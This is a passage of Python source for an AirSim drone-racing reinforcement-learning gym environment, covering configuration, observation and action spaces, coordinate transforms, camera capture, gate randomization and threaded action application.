(warning: if False, be sure to isolate workers or the program will attempt dangerous file access) (optional) act_in_obs: bool (default: True): whether the action should be appended to the observation (optional) default_act: action (default: None): action to append to obs at reset when act_in_obs is True (optional) act_preprocessor: function (default: None): preprocessor for individual actions before they are actually applied by step() (optional) obs_preprocessor: function (default: None): preprocessor for individual observations before they are returned by step() (optional) synchronous_actions: bool (default: True): whether time should be paused to apply actions simultaneously (optional) synchronous_states: bool (default: True): whether time should be paused to retrieve observations simultaneously (optional) obs_coord_system: string (default: 'dc'): coordinate system of the observations: 'dc' (fully drone-centric), 'ned' (no pitch/roll), 'global', 'all' (all coordinate systems) (optional) act_coord_system: string (default: 'dc'): coordinate system of the actions: 'dc' (fully drone-centric), 'ned' (no pitch/roll), 'global'. (add support in _get_args_kwargs_control_method() when needed) (optional) rf_config: dict (default: DEFAULT_RF_CONFIG): parameters dictionary of the reward function (optional) time_stop: bool (default: True): whether time should be stopped between steps (optional) real_time: bool (default: False): whether the action are for next time-step instead of current time-step (optional) act_threading: bool (default: True): whether actions are executed asynchronously in the RTRL setting. 
Set this to True when __apply_action_n() is a I/O operation blocking for the duration of an external time step Typically this is useful for the real world and for external simulators When this is True, __apply_action_n() should be a cpu-light I/O operation or python multithreading will slow down the calling program For cpu-intensive tasks (e.g. embedded simulators), this should be True only if you ensure that the CPU-intensive part is executed in another process while __apply_action_n() is only used for interprocess communications (optional) default_z_target: float (default: 0.0): initial Z target to make Z stabilizing APIs drone/ned-centric action_space is a gym.spaces.Tuple(gym.spaces.Box()) of length nb_drones observation_space is a gym.spaces.Tuple(gym.spaces.Dict()) of length nb_drones """ if "dummy_for_ip_port_file_init" in config and config["dummy_for_ip_port_file_init"] is True: initialize_ip_port_file() print_with_pid("DEBUG: ip_file initialized") return print_with_pid("DEBUG: Creating new environment...") # what is initialized here is what is needed for rllib dummy environments self.config = config self.use_locker = config["use_locker"] if "use_locker" in config else True self.lock_client = LockerClient() if self.use_locker else None self.img_width = config["img_width"] if "img_width" in config else DEFAULT_IMG_WIDTH self.img_height = config["img_height"] if "img_height" in config else DEFAULT_IMG_HEIGHT self.time_stop = config["time_stop"] if "time_stop" in config else True self.real_time = config["real_time"] if "real_time" in config else False self.act_threading = config["act_thread"] if "act_thread" in config else True if not self.real_time: self.act_threading = False if self.act_threading: self._at_thread = Thread(target=None, args=(), kwargs={}, daemon=True) self._at_thread.start() # dummy start for later call to join() self.act_in_obs = config["act_in_obs"] if "act_in_obs" in config else True self.default_act = config["default_act"] if "default_act" in config else None self.act_preprocessor = config["act_preprocessor"] if "act_preprocessor" in config else None self.obs_preprocessor = config["obs_preprocessor"] if "obs_preprocessor" in config else None self.synchronous_actions = config["synchronous_actions"] if "synchronous_actions" in config else True self.synchronous_states = config["synchronous_states"] if "synchronous_states" in config else True self.rf_config = config["rf_config"] if "rf_config" in config else DEFAULT_RF_CONFIG self._set_obs_coord_id(config["obs_coord_system"] if "obs_coord_system" in config else 'dc') self._set_act_coord_id(config["act_coord_system"] if "act_coord_system" in config else 'dc') self.process = None self.drones_names = config["drones_names"] self.nb_drones = len(self.drones_names) self.default_z_target = config["default_z_target"] if "default_z_target" in config else 0.0 self.z_targets = [self.default_z_target, ] * self.nb_drones self.low_bounds = config["low_bounds"] self.high_bounds = config["high_bounds"] self.history_length = config["history_length"] if "history_length" in config else 3 self.tier = config["tier"] if "tier" in config else 0 assert 1 <= self.nb_drones <= 2, "Must have 1 or 2 drones" self.action_space = self._get_action_space() self.observation_space = self._get_observation_space() self.initialized = False # Now in rllib compatibility mode we don't instantiate anything else here if "rllib_compatibility" not in config or not config["rllib_compatibility"]: print_with_pid("DEBUG: No rllib compatibility, initializing 
envrionement completely...") self._initialize() print_with_pid("DEBUG: New environment created") def _join_act_thread(self): """ This is called at the beginning of every user-side API functions (step(), reset()...) for thread safety In the RTRL setting with action threading, this ensures that the previous time-step is completed when starting a new one """ if self.act_threading: self._at_thread.join() def _apply_action_n(self, *args, **kwargs): """ This is what must be called in step() to apply an action Call this with the args and kwargs expected by self.__apply_action_n() This in turn calls self.__apply_action_n() In RTRL action-threading, self.__apply_action_n() is called in a new Thread """ if not self.act_threading: self.__apply_action_n(*args, **kwargs) else: self._at_thread = Thread(target=self.__apply_action_n, args=args, kwargs=kwargs) self._at_thread.start() def _set_control_method_id(self): """ Each ID corresponds to a pattern in the signature of the API control function If you wish to add support for a new signature pattern, define a new ID here and modify _get_args_kwargs_control_method() accordingly """ if self.control_method_str == 'moveByVelocityAsync': self.control_method_id = 1 elif self.control_method_str == 'moveByRollPitchYawrateZAsync': self.control_method_id = 2 else: # default pattern: actions are directly passed to args self.control_method_id = 0 def _set_obs_coord_id(self, str): if str == 'all': self.obs_coord_id = 0 # all coordinate systems elif str == 'dc': self.obs_coord_id = 1 # drone-centric coordinates elif str == 'ned': self.obs_coord_id = 2 # ned coordinates else: self.obs_coord_id = 3 # global coordinates def _set_act_coord_id(self, str): if str == 'dc': self.act_coord_id = 1 # drone-centric coordinates elif str == 'ned': self.act_coord_id = 2 # ned coordinates else: self.act_coord_id = 3 # global coordinates def _initialize(self): """ This is for rllib compatibility rllib will always create a dummy environment at the beginning just to get the action and observation spaces Of course we don't want a simulator to be instanciated for this dummy environment, so we create it only on the first call of reset() """ self.initialized = True config = self.config if "time_step_method" in config: if config["time_step_method"] == "CONTINUE_FOR_TIME": self.time_step_method_id = 1 else: self.time_step_method_id = 0 else: self.time_step_method_id = 0 self.histories = [] for _ in range(self.nb_drones): self.histories.append(deque(maxlen=self.history_length)) if "rendering_mode" in config: self.rendering_mode = config["rendering_mode"] else: self.rendering_mode = DEFAULT_RENDERING_MODE self.clock_speed = config["clock_speed"] self.airsim_client = config["airsim_client"] if not self.airsim_client: self.airsim_client, self.process = new_client(self.clock_speed, self.img_height, self.img_width, mode=self.rendering_mode, use_locker=self.use_locker, lock_client=self.lock_client) self.control_method_str = config["control_method_str"] self._set_control_method_id() self.control_method = getattr(self.airsim_client, self.control_method_str) self.ep_max_length = config["ep_max_length"] self.simulated_time_step = config["simulated_time_step"] self.cpu_time_step = self.simulated_time_step / self.clock_speed if "level_name" in config: self.level_name = config["level_name"] else: if np.random.randint(2) == 0: self.level_name = 'Soccer_Field_Easy' else: self.level_name = 'Soccer_Field_Medium' self.drones_offsets = config["drones_offsets"] self.current_objectives = None # this is required 
for reset>RewardFunction to retrieve gate poses only once (because the API for this is prone to bugs) self.airsim_client.simLoadLevel(self.level_name) print_with_pid("DEBUG: confirmConnection()...") self.airsim_client.confirmConnection() # failsafe time.sleep(2) # let the environment load completely obs = self.reset() self.initial_objectives, self.gates_names = self.reward_functions[0].get_objectives() # this is to save the initial configuration of the track self.current_objectives = copy.deepcopy(self.initial_objectives) print_with_pid("DEBUG: environment initialized") return obs def _kill_simulator(self): # TODO: this doesn't work because msgpckrpc/tornado is not properly reset print_with_pid("DEBUG: Killing simulator processes") if SYS_STR == 'Linux': os.killpg(os.getpgid(self.process.pid), signal.SIGKILL) else: os.kill(self.process.pid, 9) def _restart_simulator(self): # TODO: this doesn't work. See _kill_simulator() """ kills the simulator and starts a new instance """ assert self.process is not None, "ERROR: the simulator process has not been started from the environment" self._kill_simulator() self.airsim_client, self.process = new_client(self.clock_speed, self.img_height, self.img_width, mode=self.rendering_mode, use_locker=self.use_locker, lock_client=self.lock_client) self.airsim_client.simLoadLevel(self.level_name) print_with_pid("DEBUG: confirmConnection()...") self.airsim_client.confirmConnection() # failsafe time.sleep(2) # let the environment load completely return self.reset() def _get_action_space(self): # print_with_pid("DEBUG: Getting action space") elt = spaces.Box(self.low_bounds, self.high_bounds) tup = (elt,) * self.nb_drones return spaces.Tuple(tup) def _get_observation_space(self): # print_with_pid("DEBUG: Getting observation space") elt = {} if self.tier <= 1: # ground truth of everything if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['rival_linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_dc'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED elt['linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) 
elt['rival_linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_ned'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['rival_linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['rival_angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['target_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['next_target_position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) elt['target_dims_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['next_target_dims_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.tier == 0: elt['front_camera_dc'] = spaces.Box(low=0.0, high=255.0, shape=(self.history_length, self.img_height, self.img_width, 3)) else: # tiers 2 and 3 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED elt['linear_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_ned'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_velocity_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['linear_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['angular_acceleration_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['front_camera_dc'] = spaces.Box(low=0.0, high=255.0, shape=(self.history_length, self.img_height, self.img_width, 3)) if self.obs_coord_id <= 2: # in drone-centric observations, the gravity vector (ie orientation of the drone) is needed 
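# (clarifying comment, based on _get_obs() further below: 'gravity_angles_dc' is filled with the
#  roll and pitch returned by quaternion_to_roll_pitch_without_yaw(), hence the shape=(2,) Box here)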
elt['gravity_angles_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(2,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # in global observations, the position and orientation are needed elt['position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.act_in_obs: elt['action'] = self._get_action_space()[0] selt = spaces.Dict(elt) tup = (selt,) * self.nb_drones return spaces.Tuple(tup) def _get_imgs(self, camera_name, drone_idx): """ gets the current image from camera_name, drone_name appends it to the history (builds it the first time) returns a copy of the history in a numpy array """ cpt = 0 try_again = True while try_again and cpt <= MAX_GETIMAGES_TRIALS: request = [airsim.ImageRequest(camera_name, airsim.ImageType.Scene, False, False)] response = self.airsim_client.simGetImages(request, vehicle_name=self.drones_names[drone_idx]) rec_img_height = response[0].height rec_img_width = response[0].width if rec_img_height >= 1 and rec_img_width >= 1: try_again = False else: cpt += 1 print_with_pid("DEBUG: simGetImages failed, retrying...") img_rgb_1d1 = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) img = img_rgb_1d1.reshape(rec_img_height, rec_img_width, 3) if len(self.histories[drone_idx]) != 0: self.histories[drone_idx].pop() self.histories[drone_idx].appendleft(img) else: for _ in range(self.history_length): self.histories[drone_idx].appendleft(img) return np.asarray(self.histories[drone_idx]) def _get_obs(self, drone_idx, action): # TODO: tiers 2 and 3 """ Returns the observation of drone drone_idx in the tier we are considering """ # print_with_pid("DEBUG: Getting obs, drone_idx=", drone_idx) rf = self.reward_functions[drone_idx] curr_idx = rf.current_objective_idx if curr_idx >= len(rf.objectives): # track complete curr_idx = len(rf.objectives) - 1 next_idx = curr_idx + 1 if next_idx >= len(rf.objectives): next_idx = curr_idx if self.tier != 2: opp_rf = self.reward_functions[1 - drone_idx] drone_base_position = rf.current_position drone_base_orientation = rf.current_kinematics.orientation elt = {} if self.tier <= 1: # tiers 0 and 1 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() elt['rival_position_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_position - drone_base_position).to_numpy_array() elt['rival_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, opp_rf.current_kinematics.orientation).to_numpy_array() elt['rival_linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.linear_velocity).to_numpy_array() elt['rival_angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.angular_velocity).to_numpy_array() elt['rival_linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.linear_acceleration).to_numpy_array() elt['rival_angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, 
opp_rf.current_kinematics.angular_acceleration).to_numpy_array() elt['target_position_dc'] = basis_oriented_vector(drone_base_orientation, rf.objectives[curr_idx][0].position - drone_base_position).to_numpy_array() elt['target_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, rf.objectives[curr_idx][0].orientation).to_numpy_array() elt['next_target_position_dc'] = basis_oriented_vector(drone_base_orientation, rf.objectives[next_idx][0].position - drone_base_position).to_numpy_array() elt['next_target_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, rf.objectives[next_idx][0].orientation).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) elt['linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() elt['rival_position_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_position - drone_base_position).to_numpy_array() elt['rival_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, opp_rf.current_kinematics.orientation).to_numpy_array() elt['rival_linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.linear_velocity).to_numpy_array() elt['rival_angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.angular_velocity).to_numpy_array() elt['rival_linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.linear_acceleration).to_numpy_array() elt['rival_angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.angular_acceleration).to_numpy_array() elt['target_position_ned'] = basis_oriented_vector(drone_ned_orientation, rf.objectives[curr_idx][0].position - drone_base_position).to_numpy_array() elt['target_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, rf.objectives[curr_idx][0].orientation).to_numpy_array() elt['next_target_position_ned'] = basis_oriented_vector(drone_ned_orientation, rf.objectives[next_idx][0].position - drone_base_position).to_numpy_array() elt['next_target_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, rf.objectives[next_idx][0].orientation).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = rf.current_kinematics.linear_velocity.to_numpy_array() elt['angular_velocity_glo'] = rf.current_kinematics.angular_velocity.to_numpy_array() elt['linear_acceleration_glo'] = rf.current_kinematics.linear_acceleration.to_numpy_array() elt['angular_acceleration_glo'] = rf.current_kinematics.angular_acceleration.to_numpy_array() elt['rival_position_glo'] = opp_rf.current_position.to_numpy_array() elt['rival_orientation_glo'] = opp_rf.current_kinematics.orientation.to_numpy_array() elt['rival_linear_velocity_glo'] = opp_rf.current_kinematics.linear_velocity.to_numpy_array() elt['rival_angular_velocity_glo'] = opp_rf.current_kinematics.angular_velocity.to_numpy_array() elt['rival_linear_acceleration_glo'] 
= opp_rf.current_kinematics.linear_acceleration.to_numpy_array() elt['rival_angular_acceleration_glo'] = opp_rf.current_kinematics.angular_acceleration.to_numpy_array() elt['target_position_glo'] = rf.objectives[curr_idx][0].position.to_numpy_array() elt['target_orientation_glo'] = rf.objectives[curr_idx][0].orientation.to_numpy_array() elt['next_target_position_glo'] = rf.objectives[next_idx][0].position.to_numpy_array() elt['next_target_orientation_glo'] = rf.objectives[next_idx][0].orientation.to_numpy_array() elt['target_dims_glo'] = rf.objectives[curr_idx][1].to_numpy_array() elt['next_target_dims_glo'] = rf.objectives[next_idx][1].to_numpy_array() if self.tier == 0: # additional ground truthes that are not in tier 1 for dataset collection elt['front_camera_dc'] = self._get_imgs(f"fpv_cam_{drone_idx + 1}", drone_idx) else: # tiers 2 and 3 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) elt['linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = rf.current_kinematics.linear_velocity.to_numpy_array() elt['angular_velocity_glo'] = rf.current_kinematics.angular_velocity.to_numpy_array() elt['linear_acceleration_glo'] = rf.current_kinematics.linear_acceleration.to_numpy_array() elt['angular_acceleration_glo'] = rf.current_kinematics.angular_acceleration.to_numpy_array() elt['front_camera_dc'] = self._get_imgs(f"fpv_cam_{drone_idx + 1}", drone_idx) if self.obs_coord_id <= 2: # in drone-centric and ned observations, the gravity vector is needed (orientation of the drone) elt['gravity_angles_dc'] = np.array(quaternion_to_roll_pitch_without_yaw(drone_base_orientation)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # in global observations, the position and orientation are needed elt['position_glo'] = drone_base_position.to_numpy_array() elt['orientation_glo'] = drone_base_orientation.to_numpy_array() if self.act_in_obs: elt['action'] = action if self.obs_preprocessor is not None: elt = self.obs_preprocessor(elt) return elt def _update_states_and_get_rewards_and_dones(self): # print_with_pid("DEBUG: update state and get rew and dones") for reward_function in self.reward_functions: reward_function.update_state() rew_n = [] done_n = [] for reward_function in self.reward_functions: rew_n.append(reward_function.get_reward()) # can change parameters here 
done_n.append(reward_function.done) return rew_n, done_n def _gates_randomization(self): """ This randomizes gates during reset() Also contains a workaround that makes the last gate unreachable to avoid airsim bugs/crashes on their reset function """ if self.current_objectives is None: pass elif self.level_name == 'Soccer_Field_Medium': self.current_objectives = copy.deepcopy(self.initial_objectives) # delete last gate: # gate_pose = self.current_objectives[-1][0] # gate_pose.position.x_val = 1000.0 # gate_pose.position.y_val = 1000.0 # gate_pose.position.z_val = 1000.0 # self.airsim_client.simSetObjectPose(self.gates_names[-1], gate_pose) # self.current_objectives.pop() # randomize first gate (old) # randomize all gates nb_gates = len(self.current_objectives) gate_pose = self.current_objectives[0][0] x_noise = (np.random.random() - 0.5) * 10.0 # meters y_noise = (np.random.random() - 0.5) * 10.0 + 5.0 # meters z_noise = (np.random.random() - 0.5) * -2.0 # meters gate_pose.position.x_val += x_noise gate_pose.position.y_val += y_noise gate_pose.position.z_val = min(gate_pose.position.z_val + z_noise, 0.0) #check out here x_euler_angle_noise = 0.0 # radian y_euler_angle_noise = 0.0 # radian z_euler_angle_noise = (np.random.random() - 0.5) * 0.5 * np.pi # radian quaternion_noise = euler_to_quaternion(x_euler_angle_noise, y_euler_angle_noise, z_euler_angle_noise) gate_pose.orientation = quaternion_noise # FIXME: the initial pose of the first gate is by default an invalid orientation (w=1.0 and axis=0.0) that cannot be rotated self.airsim_client.simSetObjectPose(self.gates_names[0], gate_pose) for i in range(nb_gates-1): # randomize second gate: previous_gate_pose = copy.deepcopy(gate_pose) self.current_objectives[i+1][0] = previous_gate_pose gate_pose = self.current_objectives[i+1][0] x_noise = (np.random.random() - 0.5) * 10.0 # meters y_noise = (np.random.random() - 0.5) * 10.0 + 10.0 # meters z_noise = (np.random.random() - 0.5) * -2.0 # meters vector_noise = basis_oriented_vector(gate_pose.orientation.inverse(), airsim.Vector3r(x_val=x_noise, y_val=y_noise, z_val=0.0)) gate_pose.position = gate_pose.position + vector_noise gate_pose.position.z_val = z_noise x_euler_angle_noise = 0.0 # radian y_euler_angle_noise = 0.0 # radian z_euler_angle_noise = (np.random.random() - 0.5) * 0.5 * np.pi # radian quaternion_noise = euler_to_quaternion(x_euler_angle_noise, y_euler_angle_noise, z_euler_angle_noise) * gate_pose.orientation gate_pose.orientation = quaternion_noise self.airsim_client.simSetObjectPose(self.gates_names[i+1], gate_pose) def _get_args_kwargs_control_method(self, action_n, idx): """ This is where actions are interpreted in order to be passed to the control control_method For example, we convert local actions to global actions for global API functions here control_method_id must be set in _set_control_method_id() also applies action proprocessor if any """ kwargs = {'duration': self.simulated_time_step, 'vehicle_name': self.drones_names[idx]} act = action_n[idx] if self.act_preprocessor is not None: act = self.act_preprocessor(act) if self.control_method_id == 0: # default behavior args = tuple(act) elif self.control_method_id == 1: # moveByVelocityAsync behavior rf = self.reward_functions[idx] drone_base_orientation = rf.current_kinematics.orientation yaw_rate = act[3] if self.act_coord_id == 1: # drone-centric coordinates act_o = basis_oriented_vector(drone_base_orientation.inverse(), airsim.Vector3r(act[0], act[1], act[2])) # TODO: check that this is correct elif self.act_coord_id 
== 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) act_o = basis_oriented_vector(drone_ned_orientation.inverse(), airsim.Vector3r(act[0], act[1], act[2])) # TODO: check that this is correct else: # global coordinates act_o = airsim.Vector3r(act[0], act[1], act[2]) args = tuple([act_o.x_val, act_o.y_val, act_o.z_val]) kwargs['yaw_mode'] = {'is_rate': True, 'yaw_or_rate': yaw_rate} elif self.control_method_id == 2: # moveByRollPitchYawrateZAsync behavior rf = self.reward_functions[idx] act_f = copy.deepcopy(act) # ned and global coordinates if self.act_coord_id == 1 or self.act_coord_id == 2: # drone-centric or NED coordinates self.z_targets[idx] = self.z_targets[idx] + act[3] act_f[3] = self.z_targets[idx] args = tuple(act_f) return args, kwargs def _clip_action_n(self, action_n): for i, action in enumerate(action_n): if not self.action_space[i].contains(action): print(f"DEBUG: action_n:{action_n} not in action space:{self.action_space} clipping...") for j, low_bound in enumerate(self.low_bounds): diff_low = action[j] - low_bound if diff_low < 0: action_n[i][j] = low_bound for j, high_bound in enumerate(self.high_bounds): diff_high = high_bound - action[j] if diff_high < 0: action_n[i][j] = high_bound return action_n def __apply_action_n(self, action_n, idxs): """ This function applies the control API to all the drones with parameters action_n idxs is a [] of randomly sorted drone indices action bounds need to be chosen according to the chosen API control when instantiating the gym environment !: this function is the target of a Thread just before step() returns in the RTRL setting when self.act_thread is True In this specific case, all subsequent calls to the environment will join this Thread for general thread-safety """ # print_with_pid('DEBUG: apply action_n') self.airsim_client.simPause(True) if self.synchronous_actions else self.airsim_client.simPause(False) action_n = self._clip_action_n(action_n) f_n = [] for i in idxs: ff = None if not self.reward_functions[i].done: args, kwargs = self._get_args_kwargs_control_method(action_n, i) ff = self.control_method(*args, **kwargs) f_n.append(ff) if self.time_step_method_id == 1: # continueForTime / sleep method # FIXME: the actual time-step is hardware-dependent here because clockspeed is not really respected in the simulator, and simContinueForTime is bug-prone if self.time_stop: if not self.synchronous_actions: self.airsim_client.simPause(True) self.airsim_client.simContinueForTime(self.cpu_time_step) else: if self.synchronous_actions: self.airsim_client.simPause(False) time.sleep(self.cpu_time_step) else: # join method # FIXME: things happen in simulation during the time it takes to retrieve the join status and to send the simPause command if self.synchronous_actions: self.airsim_client.simPause(False) for f in f_n: if f is not None: f.join() if self.time_stop: self.airsim_client.simPause(True) def _get_states(self, action_n): """ updates the states and returns the transition outcome """ # print_with_pid('DEBUG: get transition') self.airsim_client.simPause(True) if self.synchronous_states else self.airsim_client.simPause(False) rew_n, done_n = self._update_states_and_get_rewards_and_dones() obs_n = [] info_n = [] for drone_idx in range(len(self.drones_names)): obs_n.append(self._get_obs(drone_idx, action_n[drone_idx])) info_n.append({}) # we can put gym debug info here if self.current_step >= self.ep_max_length: for i in range(len(done_n)): done_n[i] = True if not self.death_occurred: for i in range(len(done_n)): 
